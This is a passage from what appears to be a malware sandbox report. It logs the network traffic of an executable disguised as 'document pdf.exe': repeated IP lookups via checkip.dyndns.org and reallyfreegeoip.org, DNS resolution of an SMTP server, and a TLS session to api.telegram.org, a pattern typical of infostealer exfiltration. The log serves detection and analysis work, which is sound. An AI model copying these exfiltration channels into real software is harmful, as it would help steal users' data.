                                                                                                                      Jan 6, 2025 16:01:16.236716986 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.237221003 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.240848064 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.242088079 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.245820999 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.245964050 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.247176886 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.247239113 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.247406006 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.252345085 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.113532066 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.115052938 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115098953 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.115237951 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115540028 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115562916 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.167445898 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.579071999 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.580980062 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.581022978 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739783049 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739857912 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739979982 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.740607977 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.744532108 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.745976925 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.749665022 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.750772953 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.750850916 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.750883102 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.751070976 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.755872965 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.564538956 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.566026926 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566061974 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.566145897 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566433907 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566451073 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.604983091 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.042164087 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.046576023 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.046596050 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217732906 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217797041 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217868090 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.218409061 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.222429037 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.223521948 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.227509022 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.227580070 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.228316069 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.228401899 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.228496075 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.233225107 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.002355099 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.004267931 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004312992 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.004378080 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004705906 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.004724026 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.042459011 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.489613056 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.492687941 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.492721081 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650108099 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650182009 CET44349813188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.650249004 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.650846958 CET49813443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:20.655106068 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.656398058 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.660139084 CET8049807132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.660223961 CET4980780192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.661267042 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:20.661338091 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.661452055 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:20.666183949 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.534334898 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.535761118 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.535813093 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.535890102 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.536237955 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:21.536252975 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:21.589376926 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.018743038 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.020756960 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.020791054 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185461998 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185532093 CET44349825188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.185579062 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.186455011 CET49825443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:22.190324068 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.191492081 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.195310116 CET8049819132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.195453882 CET4981980192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.196315050 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:22.196405888 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.196525097 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:22.201277018 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.151318073 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.153719902 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.153750896 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.153829098 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.154232025 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.154242992 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.198738098 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.616772890 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.618767023 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.618788958 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757488966 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757556915 CET44349841188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.757666111 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.758250952 CET49841443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:24.772551060 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.777749062 CET8049830132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.777929068 CET4983080192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:24.781382084 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781424046 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:24.781488895 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781955957 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:24.781970024 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.419817924 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.419944048 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.422080040 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.422091007 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.422355890 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.423873901 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.467339039 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666327953 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666400909 CET44349847149.154.167.220192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:25.666457891 CET49847443192.168.2.6149.154.167.220
                                                                                                                      Jan 6, 2025 16:01:25.671247005 CET49847443192.168.2.6149.154.167.220
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 16:01:09.422313929 CET | 192.168.2.6 | 1.1.1.1 | 0x46db | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:11.347264051 CET | 192.168.2.6 | 1.1.1.1 | 0xd2da | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:24.773298979 CET | 192.168.2.6 | 1.1.1.1 | 0xf2ab | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:31.303633928 CET | 192.168.2.6 | 1.1.1.1 | 0x8932 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:36.752532959 CET | 192.168.2.6 | 1.1.1.1 | 0xb848 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 16:01:06.648171902 CET | 1.1.1.1 | 192.168.2.6 | 0xd065 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 16:01:06.648171902 CET | 1.1.1.1 | 192.168.2.6 | 0xd065 | No error (0) | s-part-0017.t-0009.t-msedge.net |  | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:09.429550886 CET | 1.1.1.1 | 192.168.2.6 | 0x46db | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:11.354531050 CET | 1.1.1.1 | 192.168.2.6 | 0xd2da | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:11.354531050 CET | 1.1.1.1 | 192.168.2.6 | 0xd2da | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:24.780596018 CET | 1.1.1.1 | 192.168.2.6 | 0xf2ab | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:31.314274073 CET | 1.1.1.1 | 192.168.2.6 | 0x8932 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:31.314274073 CET | 1.1.1.1 | 192.168.2.6 | 0x8932 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:31.314274073 CET | 1.1.1.1 | 192.168.2.6 | 0x8932 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:31.314274073 CET | 1.1.1.1 | 192.168.2.6 | 0x8932 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 16:01:36.759881020 CET | 1.1.1.1 | 192.168.2.6 | 0xb848 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49731 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:09.454629898 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 16:01:11.017657042 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:10 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 16:01:11.027211905 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 16:01:11.280863047 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 16:01:12.210125923 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 16:01:12.477199078 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49756 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:13.103512049 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 16:01:14.221856117 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:14 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49772 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:14.857208014 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 16:01:15.638887882 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49784 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:16.247406006 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 16:01:17.113532066 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 15:01:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49795 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:17.751070976 CET | 151 bytes | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 6, 2025 16:01:18.564538956 CET | 273 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:18 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49807 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:19.228496075 CET | 151 bytes | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 6, 2025 16:01:20.002355099 CET | 273 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:19 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49819 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:20.661452055 CET | 151 bytes | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 6, 2025 16:01:21.534334898 CET | 273 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:21 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49830 | 132.226.8.169 | 80 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 16:01:22.196525097 CET | 151 bytes | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Jan 6, 2025 16:01:24.151318073 CET | 273 bytes | IN | HTTP/1.1 200 OK
  Date: Mon, 06 Jan 2025 15:01:24 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49744 | 188.114.96.3 | 443 | 2672 | C:\Users\user\Desktop\document pdf.exe

Timestamp | Bytes transferred | Direction | Data
